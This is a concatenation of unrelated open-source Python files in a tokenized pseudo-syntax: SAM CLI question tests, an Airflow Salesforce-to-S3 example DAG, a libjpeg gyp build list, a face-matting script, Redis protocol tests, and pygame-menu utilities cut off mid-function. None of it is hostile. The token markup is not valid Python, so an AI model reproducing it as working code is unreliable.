<import_from_stmt>typing List Union Dict<import_from_stmt>unittest TestCase<import_from_stmt>unittest.mock ANY patch Mock<import_from_stmt>parameterized parameterized<import_from_stmt>samcli.lib.cookiecutter.question Question QuestionKind Choice Confirm Info QuestionFactory<class_stmt>TestQuestion(TestCase)<block_start>_ANY_TEXT="any text"<line_sep>_ANY_KEY="any key"<line_sep>_ANY_OPTIONS=["option1" "option2" "option3"]<line_sep>_ANY_ANSWER="any answer"<line_sep>_ANY_NEXT_QUESTION_MAP={"option1":"key1" "option2":"key2" "option3":"key3" }<line_sep>_ANY_DEFAULT_NEXT_QUESTION_KEY="default"<line_sep>_ANY_KIND=QuestionKind.question<def_stmt>setUp self<block_start>self.question=Question(text=self._ANY_TEXT key=self._ANY_KEY default=self._ANY_ANSWER is_required=<true> allow_autofill=<false> next_question_map=self._ANY_NEXT_QUESTION_MAP default_next_question_key=self._ANY_DEFAULT_NEXT_QUESTION_KEY )<block_end><def_stmt>get_question_with_default_from_cookiecutter_context_using_keypath self key_path:List[Union[str Dict]]<arrow>Question<block_start><return>Question(text=self._ANY_TEXT key=self._ANY_KEY default={"keyPath":key_path} is_required=<true> next_question_map=self._ANY_NEXT_QUESTION_MAP default_next_question_key=self._ANY_DEFAULT_NEXT_QUESTION_KEY )<block_end><def_stmt>test_creating_questions self<block_start>q=Question(text=self._ANY_TEXT key=self._ANY_KEY)<line_sep>self.assertEqual(q.text self._ANY_TEXT)<line_sep>self.assertEqual(q.key self._ANY_KEY)<line_sep>self.assertEqual(q.default_answer "")<line_sep>self.assertFalse(q.required)<line_sep>self.assertEqual(q.next_question_map {})<line_sep>self.assertIsNone(q.default_next_question_key)<line_sep>q=self.question<line_sep>self.assertEqual(q.text self._ANY_TEXT)<line_sep>self.assertEqual(q.key self._ANY_KEY)<line_sep>self.assertEqual(q.default_answer self._ANY_ANSWER)<line_sep>self.assertTrue(q.required)<line_sep>self.assertEqual(q.next_question_map self._ANY_NEXT_QUESTION_MAP)<line_sep>self.assertEqual(q.default_next_question_key self._ANY_DEFAULT_NEXT_QUESTION_KEY)<block_end><def_stmt>test_question_key_and_text_are_required self<block_start><with_stmt>(self.assertRaises(TypeError))<block_start>Question(text=self._ANY_TEXT)<block_end><with_stmt>(self.assertRaises(TypeError))<block_start>Question(key=self._ANY_KEY)<block_end><block_end><def_stmt>test_get_next_question_key self<block_start>self.assertEqual(self.question.get_next_question_key("option1") "key1")<line_sep>self.assertEqual(self.question.get_next_question_key("option2") "key2")<line_sep>self.assertEqual(self.question.get_next_question_key("option3") "key3")<line_sep>self.assertEqual(self.question.get_next_question_key("any-option") self._ANY_DEFAULT_NEXT_QUESTION_KEY)<line_sep>self.question.set_default_next_question_key("new_default")<line_sep>self.assertEqual(self.question.get_next_question_key(<none>) "new_default")<block_end>@patch("samcli.lib.cookiecutter.question.click")<def_stmt>test_ask self mock_click<block_start>mock_click.prompt.return_value=self._ANY_ANSWER<line_sep>answer=self.question.ask({})<line_sep>self.assertEqual(answer self._ANY_ANSWER)<line_sep>mock_click.prompt.assert_called_once_with(text=self.question.text default=self.question.default_answer)<block_end>@patch("samcli.lib.cookiecutter.question.click")<def_stmt>test_ask_resolves_from_cookiecutter_context self mock_click# Setup <block_start>expected_default_value=Mock()<line_sep>previous_question_key="this is a question"<line_sep>previous_question_answer="this is an answer"<line_sep>context={"['x', 'this is an answer']":expected_default_value previous_question_key:previous_question_answer }<line_sep>question=self.get_question_with_default_from_cookiecutter_context_using_keypath(["x" {"valueOf":previous_question_key}])<line_sep># Trigger question.ask(context=context)<line_sep># Verify mock_click.prompt.assert_called_once_with(text=self.question.text default=expected_default_value)<block_end>@patch("samcli.lib.cookiecutter.question.click")<def_stmt>test_ask_resolves_from_cookiecutter_context_non_exist_key_path self mock_click# Setup <block_start>context={}<line_sep>question=self.get_question_with_default_from_cookiecutter_context_using_keypath(["y"])<line_sep># Trigger question.ask(context=context)<line_sep># Verify mock_click.prompt.assert_called_once_with(text=self.question.text default=<none>)<block_end><def_stmt>test_ask_resolves_from_cookiecutter_context_non_exist_question_key self# Setup <block_start>expected_default_value=Mock()<line_sep>previous_question_key="this is a question"<line_sep>previous_question_answer="this is an answer"<line_sep>context={"['x', 'this is an answer']":expected_default_value previous_question_key:previous_question_answer }<line_sep>question=self.get_question_with_default_from_cookiecutter_context_using_keypath(["x" {"valueOf":"non_exist_question_key"}])<line_sep># Trigger <with_stmt>self.assertRaises(KeyError)<block_start>question.ask(context=context)<block_end><block_end>@parameterized.expand([("this should have been a list") ([1] ) ({} )])<def_stmt>test_ask_resolves_from_cookiecutter_context_with_key_path_not_a_list self key_path# Setup <block_start>context={}<line_sep>question=self.get_question_with_default_from_cookiecutter_context_using_keypath(key_path)<line_sep># Trigger <with_stmt>self.assertRaises(ValueError)<block_start>question.ask(context=context)<block_end><block_end>@parameterized.expand([({"keyPath123":Mock()} ) ({"keyPath":[{"valueOf123":Mock()}]} )])<def_stmt>test_ask_resolves_from_cookiecutter_context_with_default_object_missing_keys self default_object# Setup <block_start>context={}<line_sep>question=self.get_question_with_default_from_cookiecutter_context_using_keypath([])<line_sep>question._default_answer=default_object<line_sep># Trigger <with_stmt>self.assertRaises(KeyError)<block_start>question.ask(context=context)<block_end><block_end><def_stmt>test_question_allow_autofill_with_default_value self<block_start>q=Question(text=self._ANY_TEXT key=self._ANY_KEY is_required=<true> allow_autofill=<true> default="123")<line_sep>self.assertEquals("123" q.ask())<block_end>@patch("samcli.lib.cookiecutter.question.click")<def_stmt>test_question_allow_autofill_without_default_value self click_mock<block_start>answer_mock=click_mock.prompt.return_value=Mock()<line_sep>q=Question(text=self._ANY_TEXT key=self._ANY_KEY is_required=<true> allow_autofill=<true>)<line_sep>self.assertEquals(answer_mock q.ask())<block_end><block_end><class_stmt>TestChoice(TestCase)<block_start><def_stmt>setUp self<block_start>self.question=Choice(text=TestQuestion._ANY_TEXT key=TestQuestion._ANY_KEY options=TestQuestion._ANY_OPTIONS default=TestQuestion._ANY_ANSWER is_required=<true> next_question_map=TestQuestion._ANY_NEXT_QUESTION_MAP default_next_question_key=TestQuestion._ANY_DEFAULT_NEXT_QUESTION_KEY )<block_end><def_stmt>test_create_choice_question self<block_start>self.assertEqual(self.question.text TestQuestion._ANY_TEXT)<line_sep>self.assertEqual(self.question.key TestQuestion._ANY_KEY)<line_sep>self.assertEqual(self.question._options TestQuestion._ANY_OPTIONS)<with_stmt>(self.assertRaises(TypeError))<block_start>Choice(key=TestQuestion._ANY_KEY text=TestQuestion._ANY_TEXT)<block_end><with_stmt>(self.assertRaises(ValueError))<block_start>Choice(key=TestQuestion._ANY_KEY text=TestQuestion._ANY_TEXT options=<none>)<block_end><with_stmt>(self.assertRaises(ValueError))<block_start>Choice(key=TestQuestion._ANY_KEY text=TestQuestion._ANY_TEXT options=[])<block_end><block_end><def_stmt>test_get_options_indexes_with_different_bases self<block_start>indexes=self.question._get_options_indexes()<line_sep>self.assertEqual(indexes [0 1 2])<line_sep>indexes=self.question._get_options_indexes(base=1)<line_sep>self.assertEqual(indexes [1 2 3])<block_end>@patch("samcli.lib.cookiecutter.question.click.Choice")@patch("samcli.lib.cookiecutter.question.click")<def_stmt>test_ask self mock_click mock_choice<block_start>mock_click.prompt.return_value=2<line_sep>answer=self.question.ask({})<line_sep>self.assertEqual(answer TestQuestion._ANY_OPTIONS[1])# we deduct one from user's choice (base 1 vs base 0) mock_click.prompt.assert_called_once_with(text="Choice" default=self.question.default_answer show_choices=<false> type=ANY show_default=self.question.default_answer<is><not><none> )<line_sep>mock_choice.assert_called_once_with(["1" "2" "3"])<block_end><block_end><class_stmt>TestInfo(TestCase)<block_start>@patch("samcli.lib.cookiecutter.question.click")<def_stmt>test_ask self mock_click<block_start>q=Info(text=TestQuestion._ANY_TEXT key=TestQuestion._ANY_KEY)<line_sep>mock_click.echo.return_value=<none><line_sep>answer=q.ask({})<line_sep>self.assertIsNone(answer)<line_sep>mock_click.echo.assert_called_once_with(message=q.text)<block_end><block_end><class_stmt>TestConfirm(TestCase)<block_start>@patch("samcli.lib.cookiecutter.question.click")<def_stmt>test_ask self mock_click<block_start>q=Confirm(text=TestQuestion._ANY_TEXT key=TestQuestion._ANY_KEY)<line_sep>mock_click.confirm.return_value=<true><line_sep>answer=q.ask({})<line_sep>self.assertTrue(answer)<line_sep>mock_click.confirm.assert_called_once_with(text=q.text)<block_end><block_end><class_stmt>TestQuestionFactory(TestCase)<block_start><def_stmt>test_there_is_a_handler_for_each_question_kind self<block_start>question_json={"key":TestQuestion._ANY_KEY "question":TestQuestion._ANY_TEXT "options":["a" "b"]}<for_stmt>kind QuestionKind<block_start>question_json["kind"]=kind.name<line_sep>q=QuestionFactory.create_question_from_json(question_json)<line_sep>expected_type=QuestionFactory.question_classes[kind]<line_sep>self.assertTrue(isinstance(q expected_type))<block_end><block_end><block_end>
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. """ This is a basic example DAG for using `SalesforceToS3Operator` to retrieve Salesforce customer data and upload to an S3 bucket. """<import_from_stmt>datetime datetime<import_from_stmt>airflow DAG<import_from_stmt>airflow.providers.amazon.aws.operators.s3_copy_object S3CopyObjectOperator<import_from_stmt>airflow.providers.amazon.aws.operators.s3_delete_objects S3DeleteObjectsOperator<import_from_stmt>airflow.providers.amazon.aws.transfers.salesforce_to_s3 SalesforceToS3Operator<line_sep>BASE_PATH="salesforce/customers"<line_sep>FILE_NAME="customer_daily_extract_{{ ds_nodash }}.csv"<with_stmt>DAG(dag_id="example_salesforce_to_s3_transfer" schedule_interval="@daily" start_date=datetime(2021 7 8) catchup=<false> default_args={"retries":1 "aws_conn_id":"s3"} tags=["example"] default_view="graph" )<as>dag# [START howto_operator_salesforce_to_s3_transfer] <block_start>upload_salesforce_data_to_s3_landing=SalesforceToS3Operator(task_id="upload_salesforce_data_to_s3" salesforce_query="SELECT Id, Name, Company, Phone, Email, LastModifiedDate, IsActive FROM Customers" s3_bucket_name="landing-bucket" s3_key=f"{BASE_PATH}/{FILE_NAME}" salesforce_conn_id="salesforce" replace=<true> )<line_sep># [END howto_operator_salesforce_to_s3_transfer] date_prefixes="{{ execution_date.strftime('%Y/%m/%d') }}"<line_sep>store_to_s3_data_lake=S3CopyObjectOperator(task_id="store_to_s3_data_lake" source_bucket_key=upload_salesforce_data_to_s3_landing.output dest_bucket_name="data_lake" dest_bucket_key=f"{BASE_PATH}/{date_prefixes}/{FILE_NAME}" )<line_sep>delete_data_from_s3_landing=S3DeleteObjectsOperator(task_id="delete_data_from_s3_landing" bucket=upload_salesforce_data_to_s3_landing.s3_bucket_name keys=upload_salesforce_data_to_s3_landing.s3_key )<line_sep>store_to_s3_data_lake<rshift>delete_data_from_s3_landing<line_sep># Task dependencies created via `XComArgs`: # upload_salesforce_data_to_s3_landing >> store_to_s3_data_lake <block_end>
{'includes':['../common.gyp'] 'targets':[{'target_name':'libjpeg' 'type':'static_library' 'include_dirs':['.' ] 'sources':['ckconfig.c' 'jcapimin.c' 'jcapistd.c' 'jccoefct.c' 'jccolor.c' 'jcdctmgr.c' 'jchuff.c' 'jcinit.c' 'jcmainct.c' 'jcmarker.c' 'jcmaster.c' 'jcomapi.c' 'jcparam.c' 'jcphuff.c' 'jcprepct.c' 'jcsample.c' 'jctrans.c' 'jdapimin.c' 'jdapistd.c' 'jdatadst.c' 'jdatasrc.c' 'jdcoefct.c' 'jdcolor.c' 'jddctmgr.c' 'jdhuff.c' 'jdinput.c' 'jdmainct.c' 'jdmarker.c' 'jdmaster.c' 'jdmerge.c' 'jdphuff.c' 'jdpostct.c' 'jdsample.c' 'jdtrans.c' 'jerror.c' 'jfdctflt.c' 'jfdctfst.c' 'jfdctint.c' 'jidctflt.c' 'jidctfst.c' 'jidctint.c' 'jidctred.c' 'jmemansi.c' #'jmemdos.c', #'jmemmac.c', 'jmemmgr.c' #'jmemname.c', #'jmemnobs.c', 'jquant1.c' 'jquant2.c' 'jutils.c' ] } ]}<line_sep>
<import_stmt>argparse<import_stmt>cv2<import_stmt>numpy<as>np<import_stmt>torch.nn.functional<as>F<import_from_stmt>torchvision.transforms.functional normalize<import_from_stmt>facexlib.matting init_matting_model<import_from_stmt>facexlib.utils img2tensor<def_stmt>main args<block_start>modnet=init_matting_model()<line_sep># read image img=cv2.imread(args.img_path)/255.<line_sep># unify image channels to 3 <if_stmt>len(img.shape)<eq>2<block_start>img=img[: : <none>]<block_end><if_stmt>img.shape[2]<eq>1<block_start>img=np.repeat(img 3 axis=2)<block_end><elif_stmt>img.shape[2]<eq>4<block_start>img=img[: : 0:3]<block_end>img_t=img2tensor(img bgr2rgb=<true> float32=<true>)<line_sep>normalize(img_t (0.5 0.5 0.5) (0.5 0.5 0.5) inplace=<true>)<line_sep>img_t=img_t.unsqueeze(0).cuda()<line_sep># resize image for input _,_,im_h,im_w=img_t.shape<line_sep>ref_size=512<if_stmt>max(im_h im_w)<l>ref_size<or>min(im_h im_w)<g>ref_size<block_start><if_stmt>im_w<ge>im_h<block_start>im_rh=ref_size<line_sep>im_rw=int(im_w/im_h<times>ref_size)<block_end><elif_stmt>im_w<l>im_h<block_start>im_rw=ref_size<line_sep>im_rh=int(im_h/im_w<times>ref_size)<block_end><block_end><else_stmt><block_start>im_rh=im_h<line_sep>im_rw=im_w<block_end>im_rw=im_rw-im_rw%32<line_sep>im_rh=im_rh-im_rh%32<line_sep>img_t=F.interpolate(img_t size=(im_rh im_rw) mode='area')<line_sep># inference _,_,matte=modnet(img_t <true>)<line_sep># resize and save matte matte=F.interpolate(matte size=(im_h im_w) mode='area')<line_sep>matte=matte[0][0].data.cpu().numpy()<line_sep>cv2.imwrite(args.save_path (matte<times>255).astype('uint8'))<line_sep># get foreground matte=matte[: : <none>]<line_sep>foreground=img<times>matte+np.full(img.shape 1)<times>(1-matte)<line_sep>cv2.imwrite(args.save_path.replace('.png' '_fg.png') foreground<times>255)<block_end><if_stmt>__name__<eq>'__main__'<block_start>parser=argparse.ArgumentParser()<line_sep>parser.add_argument('--img_path' type=str default='assets/test.jpg')<line_sep>parser.add_argument('--save_path' type=str default='test_matting.png')<line_sep>args=parser.parse_args()<line_sep>main(args)<block_end>
# coding: utf-8 # Copyright 2015 <NAME> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>six<import_stmt>txredisapi<as>redis<import_from_stmt>twisted.trial unittest<import_from_stmt>twisted.internet.protocol ClientFactory<import_from_stmt>twisted.test.proto_helpers StringTransportWithDisconnection<import_from_stmt>twisted.internet task<class_stmt>MockFactory(ClientFactory)<block_start><pass><block_end><class_stmt>LineReceiverSubclass(redis.LineReceiver)<block_start><def_stmt>lineReceived self line<block_start>self._rcvd_line=line<block_end><def_stmt>rawDataReceived self data<block_start>self._rcvd_data=data<block_end><block_end><class_stmt>TestLineReciever(unittest.TestCase)<block_start>S=six.b('TEST')<def_stmt>setUp self<block_start>self.proto=LineReceiverSubclass()<line_sep>self.transport=StringTransportWithDisconnection()<line_sep>self.proto.makeConnection(self.transport)<line_sep>self.transport.protocol=self.proto<line_sep>self.proto.factory=MockFactory()<block_end><def_stmt>test_excess_line_length self<block_start>self.assertTrue(self.transport.connected)<line_sep>self.proto.dataReceived(six.b('\x00')<times>(self.proto.MAX_LENGTH+1))<line_sep>self.assertFalse(self.transport.connected)<block_end><def_stmt>test_excess_delimited_line self<block_start>self.assertTrue(self.transport.connected)<line_sep>self.proto.dataReceived(self.S+self.proto.delimiter)<line_sep>self.assertEqual(self.proto._rcvd_line self.S.decode())<line_sep>s=(six.b('\x00')<times>(self.proto.MAX_LENGTH+1))+self.proto.delimiter<line_sep>self.proto._rcvd_line=<none><line_sep>self.proto.dataReceived(s)<line_sep>self.assertFalse(self.transport.connected)<line_sep>self.assertIs(self.proto._rcvd_line <none>)<block_end><def_stmt>test_clear_line_buffer self<block_start>self.proto.dataReceived(self.S)<line_sep>self.assertEqual(self.proto.clearLineBuffer() self.S)<block_end><def_stmt>test_send_line self<block_start>self.proto.dataReceived(self.S+self.proto.delimiter)<line_sep>self.assertEqual(self.proto._rcvd_line self.S.decode())<block_end><def_stmt>test_raw_data self<block_start>clock=task.Clock()<line_sep>self.proto.callLater=clock.callLater<line_sep>self.proto.setRawMode()<line_sep>s=self.S+self.proto.delimiter<line_sep>self.proto.dataReceived(s)<line_sep>self.assertEqual(self.proto._rcvd_data s)<line_sep>self.proto._rcvd_line=<none><line_sep>self.proto.setLineMode(s)<line_sep>clock.advance(1)<line_sep>self.assertEqual(self.proto._rcvd_line self.S.decode())<line_sep>self.proto.dataReceived(s)<line_sep>self.assertEqual(self.proto._rcvd_line self.S.decode())<block_end><def_stmt>test_sendline self<block_start>self.proto.sendLine(self.S)<line_sep>value=self.transport.value()<line_sep>self.assertEqual(value self.S+self.proto.delimiter)<block_end><block_end><class_stmt>TestBaseRedisProtocol(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>self._protocol=redis.BaseRedisProtocol()<block_end><def_stmt>test_build_ping self<block_start>s=self._protocol._build_command("PING")<line_sep>self.assertEqual(s six.b('*1\r\n$4\r\nPING\r\n'))<block_end><block_end>
""" pygame-menu https://github.com/ppizarror/pygame-menu UTILS Utility functions. License: ------------------------------------------------------------------------------- The MIT License (MIT) Copyright 2017-2021 <NAME>. @ppizarror Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ------------------------------------------------------------------------------- """<line_sep>__all__=[# Methods 'assert_alignment' 'assert_color' 'assert_cursor' 'assert_list_vector' 'assert_orientation' 'assert_position' 'assert_position_vector' 'assert_vector' 'check_key_pressed_valid' 'fill_gradient' 'format_color' 'get_cursor' 'get_finger_pos' 'is_callable' 'load_pygame_image_file' 'make_surface' 'mouse_motion_current_mouse_position' 'parse_padding' 'print_menu_widget_structure' 'set_pygame_cursor' 'uuid4' 'warn' 'widget_terminal_title' # Constants 'PYGAME_V2' # Classes 'TerminalColors']<import_stmt>functools<line_sep># import inspect <import_stmt>sys<import_stmt>traceback<import_stmt>types<import_stmt>uuid<import_stmt>warnings<import_stmt>pygame<import_stmt>pygame_menu<import_from_stmt>pygame_menu.locals ALIGN_CENTER ALIGN_LEFT ALIGN_RIGHT POSITION_CENTER POSITION_NORTH POSITION_SOUTH POSITION_SOUTHEAST POSITION_NORTHWEST POSITION_WEST POSITION_EAST POSITION_NORTHEAST POSITION_SOUTHWEST ORIENTATION_HORIZONTAL ORIENTATION_VERTICAL FINGERDOWN FINGERUP FINGERMOTION<import_from_stmt>pygame_menu._types ColorType ColorInputType Union List Vector2NumberType NumberType Any Optional Tuple NumberInstance VectorInstance PaddingInstance PaddingType Tuple4IntType ColorInputInstance VectorType EventType CursorInputInstance CursorInputType Tuple2IntType Dict<line_sep>PYGAME_V2=pygame.version.vernum[0]<ge>2<line_sep>WARNINGS_LAST_MESSAGES:Dict[int bool]={}<def_stmt>assert_alignment align:str<arrow><none><block_start>""" Assert that a certain alignment is valid. :param align: Align value :return: None """<assert_stmt>isinstance(align str) f'alignment "{align}" must be a string'<assert_stmt>align<in>(ALIGN_LEFT ALIGN_CENTER ALIGN_RIGHT) f'incorrect alignment value "{align}"'<block_end><def_stmt>assert_color color:Union[ColorInputType List[int]] warn_if_invalid:bool=<true><arrow>ColorType<block_start>""" Assert that a certain color is valid. :param color: Object color :param warn_if_invalid: If ``True`` warns if the color is invalid :return: Formatted color if valid, else, throws an ``AssertionError`` exception """<line_sep>color=format_color(color warn_if_invalid=warn_if_invalid)<assert_stmt>isinstance(color VectorInstance) f'color must be a tuple or list, not type "{type(color)}"'<assert_stmt>4<ge>len(color)<ge>3 'color must be a tuple or list of 3 or 4 numbers'<for_stmt>i range(3)<block_start><assert_stmt>isinstance(color[i] int) f'"{color[i]}" in element color {color} must be an integer, not type "{type(color)}"'<assert_stmt>0<le>color[i]<le>255 f'"{color[i]}" in element color {color} must be an integer between 0 and 255'<block_end><if_stmt>len(color)<eq>4<block_start><assert_stmt>isinstance(color[3] int) f'alpha channel must be an integer between 0 and 255, not type "{type(color)}"'<assert_stmt>0<le>color[3]<le>255 f'opacity of color {color} must be an integer between 0 and 255; '<concat>f'where 0 is fully-transparent and 255 is fully-opaque'<block_end><return>color<block_end><def_stmt>assert_cursor cursor:CursorInputType<arrow><none><block_start>""" Assert a given cursor is valid. :param cursor: Cursor object :return: None """<assert_stmt>isinstance(cursor CursorInputInstance) 'cursor instance invalid, it can be None, an integer, '<concat>'or pygame.cursors.Cursor'<block_end><def_stmt>assert_list_vector list_vector:Union[List[Vector2NumberType] Tuple[Vector2NumberType <ellipsis>]] length:int<arrow><none><block_start>""" Assert that a list fixed length vector is numeric. :param list_vector: Numeric list vector :param length: Length of the required vector. If ``0`` don't check the length :return: None """<assert_stmt>isinstance(list_vector VectorInstance) f'list_vector "{list_vector}" must be a tuple or list'<for_stmt>v list_vector<block_start>assert_vector(v length)<block_end><block_end><def_stmt>assert_orientation orientation:str<arrow><none><block_start>""" Assert that a certain widget orientation is valid. :param orientation: Object orientation :return: None """<assert_stmt>isinstance(orientation str) f'orientation "{orientation}" must be a string'<assert_stmt>orientation<in>(ORIENTATION_HORIZONTAL ORIENTATION_VERTICAL) f'invalid orientation value "{orientation}"'<block_end><def_stmt>assert_position position:str<arrow><none><block_start>""" Assert that a certain position is valid. :param position: Object position :return: None """<assert_stmt>isinstance(position str) f'position "{position}" must be a string'<assert_stmt>position<in>(POSITION_WEST POSITION_SOUTHWEST POSITION_SOUTH POSITION_SOUTHEAST POSITION_EAST POSITION_NORTH POSITION_NORTHWEST POSITION_NORTHEAST POSITION_CENTER) f'invalid position value "{position}"'<block_end><def_stmt>assert_position_vector position:Union[str List[str] Tuple[str <ellipsis>]]<arrow><none><block_start>""" Assert that a position vector is valid. :param position: Object position :return: None """<if_stmt>isinstance(position str)<block_start>assert_position(position)<block_end><else_stmt><block_start><assert_stmt>isinstance(position VectorInstance)<line_sep>unique=[]<for_stmt>pos position<block_start>assert_position(pos)<if_stmt>pos<not><in>unique<block_start>unique.append(pos)<block_end><block_end><assert_stmt>len(unique)<eq>len(position) 'there cannot be repeated positions'<block_end><block_end><def_stmt>assert_vector num_vector:VectorType length:int instance:type=NumberInstance<arrow><none><block_start>""" Assert that a fixed length vector is numeric. :param num_vector: Numeric vector :param length: Length of the required vector. If ``0`` don't check the length :param instance: Instance of each item of the vector :return: None """<assert_stmt>isinstance(num_vector VectorInstance) f'vector "{num_vector}" must be a list or tuple of {length} items if type {instance}'<if_stmt>length<ne>0<block_start><assert_stmt>len(num_vector)<eq>length f'vector "{num_vector}" must contain {length} numbers only, '<concat>f'but {num_vector} were given'<block_end><for_stmt>i range(len(num_vector))<block_start>num=num_vector[i]<if_stmt>instance<eq>int<and>isinstance(num float)<and>int(num)<eq>num<block_start>num=int(num)<block_end><assert_stmt>isinstance(num instance) f'item {num} of vector must be {instance}, not type "{type(num)}"'<block_end><block_end><def_stmt>check_key_pressed_valid event:EventType<arrow>bool<block_start>""" Checks if the pressed key is valid. :param event: Key press event :return: ``True`` if a key is pressed """<line_sep># If the system detects that any key event has been pressed but # there's not any key pressed then this method raises a KEYUP # flag bad_event=<not>(<true><in>pygame.key.get_pressed())<if_stmt>bad_event<block_start><if_stmt>'test'<in>event.dict<and>event.dict['test']<block_start><return><true><block_end>ev=pygame.event.Event(pygame.KEYUP {'key':event.key})<line_sep>pygame.event.post(ev)<block_end><return><not>bad_event<block_end><def_stmt>fill_gradient surface:'pygame.Surface' color:ColorInputType gradient:ColorInputType rect:Optional['pygame.Rect']=<none> vertical:bool=<true> forward:bool=<true><arrow><none><block_start>""" Fill a surface with a gradient pattern. :param surface: Surface to fill :param color: Starting color :param gradient: Final color :param rect: Area to fill; default is surface's rect :param vertical: True=vertical; False=horizontal :param forward: True=forward; False=reverse :return: None """<if_stmt>rect<is><none><block_start>rect=surface.get_rect()<block_end>x1,x2=rect.left rect.right<line_sep>y1,y2=rect.top rect.bottom<line_sep>color=assert_color(color)<line_sep>gradient=assert_color(gradient)<if_stmt>vertical<block_start>h=y2-y1<block_end><else_stmt><block_start>h=x2-x1<block_end><if_stmt>forward<block_start>a,b=color gradient<block_end><else_stmt><block_start>b,a=color gradient<block_end>rate=(float(b[0]-a[0])/h float(b[1]-a[1])/h float(b[2]-a[2])/h)<line_sep>fn_line=pygame.draw.line<if_stmt>vertical<block_start><for_stmt>line range(y1 y2)<block_start>color=(min(max(a[0]+(rate[0]<times>(line-y1)) 0) 255) min(max(a[1]+(rate[1]<times>(line-y1)) 0) 255) min(max(a[2]+(rate[2]<times>(line-y1)) 0) 255))<line_sep>fn_line(surface color (x1 line) (x2 line))<block_end><block_end><else_stmt><block_start><for_stmt>col range(x1 x2)<block_start>color=(min(max(a[0]+(rate[0]<times>(col-x1)) 0) 255) min(max(a[1]+(rate[1]<times>(col-x1)) 0) 255) min(max(a[2]+(rate[2]<times>(col-x1)) 0) 255))<line_sep>fn_line(surface color (col y1) (col y2))<block_end><block_end><block_end><def_stmt>format_color color:Union[ColorInputType Any] warn_if_invalid:bool=<true><arrow>Union[ColorType Any]<block_start>""" Format color from string, int, or tuple to tuple type. Available formats: - Color name str: name of the color to use, e.g. ``"red"`` (all the supported name strings can be found in the colordict module, see https://github.com/pygame/pygame/blob/main/src_py/colordict.py) - HTML color format str: ``"#rrggbbaa"`` or ``"#rrggbb"``, where rr, gg, bb, and aa are 2-digit hex numbers in the range of ``0`` to ``0xFF`` inclusive, the aa (alpha) value defaults to ``0xFF`` if not provided - Hex number str: ``"0xrrggbbaa"`` or ``"0xrrggbb"``, where rr, gg, bb, and aa are 2-digit hex numbers in the range of ``0x00`` to ``0xFF`` inclusive, the aa (alpha) value defaults to ``0xFF`` if not provided - int: int value of the color to use, using hex numbers can make this parameter more readable, e.g. ``0xrrggbbaa``, where rr, gg, bb, and aa are 2-digit hex numbers in the range of ``0x00`` to ``0xFF`` inclusive, note that the aa (alpha) value is not optional for the int format and must be provided - tuple/list of int color values: ``(R, G, B, A)`` or ``(R, G, B)``, where R, G, B, and A are int values in the range of ``0`` to ``255`` inclusive, the A (alpha) value defaults to ``255`` (opaque) if not provided :param color: Color to format. If format is valid returns the same input value :param warn_if_invalid: If ``True`` warns if the color is invalid :return: Color in (r, g, b, a) format """<if_stmt><not>isinstance(color ColorInputInstance)<block_start><return>color<block_end><if_stmt><not>isinstance(color pygame.Color)<block_start><try_stmt><block_start><if_stmt>isinstance(color VectorInstance)<and>3<le>len(color)<le>4<block_start><if_stmt>PYGAME_V2<block_start><for_stmt>j color<block_start><if_stmt><not>isinstance(j int)<block_start><raise>ValueError('color cannot contain floating point values')<block_end><block_end><block_end>c=pygame.Color(*color)<block_end><else_stmt><block_start>c=pygame.Color(color)<block_end><block_end><except_stmt>ValueError<block_start><if_stmt>warn_if_invalid<block_start>warn(f'invalid color value "{color}"')<block_end><else_stmt><block_start><raise><block_end><return>color<block_end><block_end><else_stmt><block_start>c=color<block_end><return>c.r c.g c.b c.a<block_end><def_stmt>get_cursor <arrow>CursorInputType<block_start>""" Return the pygame cursor object. :return: Cursor object """<try_stmt><block_start><return>pygame.mouse.get_cursor()<block_end><except_stmt>TypeError<as>e<block_start>warn(str(e))<block_end><return><none><block_end><def_stmt>get_finger_pos menu:'pygame_menu.Menu' event:EventType<arrow>Tuple2IntType<block_start>""" Return the position from finger (or mouse) event on x-axis and y-axis (x, y). :param menu: Menu object for relative positioning in finger events :param event: Pygame event object :return: Position on x-axis and y-axis (x, y) in px """<if_stmt>event.type<in>(FINGERDOWN FINGERMOTION FINGERUP)<block_start><assert_stmt>menu<is><not><none> 'menu reference cannot be none while using finger position'<line_sep>display_size=menu.get_window_size()<line_sep>finger_pos=(int(event.x<times>display_size[0]) int(event.y<times>display_size[1]))<line_sep><return>finger_pos<block_end><return>event.pos<block_end><def_stmt>is_callable func:Any<arrow>bool<block_start>""" Return ``True`` if ``func`` is callable. :param func: Function object :return: ``True`` if function """<line_sep># noinspection PyTypeChecker <return>isinstance(func (types.FunctionType types.BuiltinFunctionType types.MethodType functools.partial))<block_end><def_stmt>load_pygame_image_file image_path:str 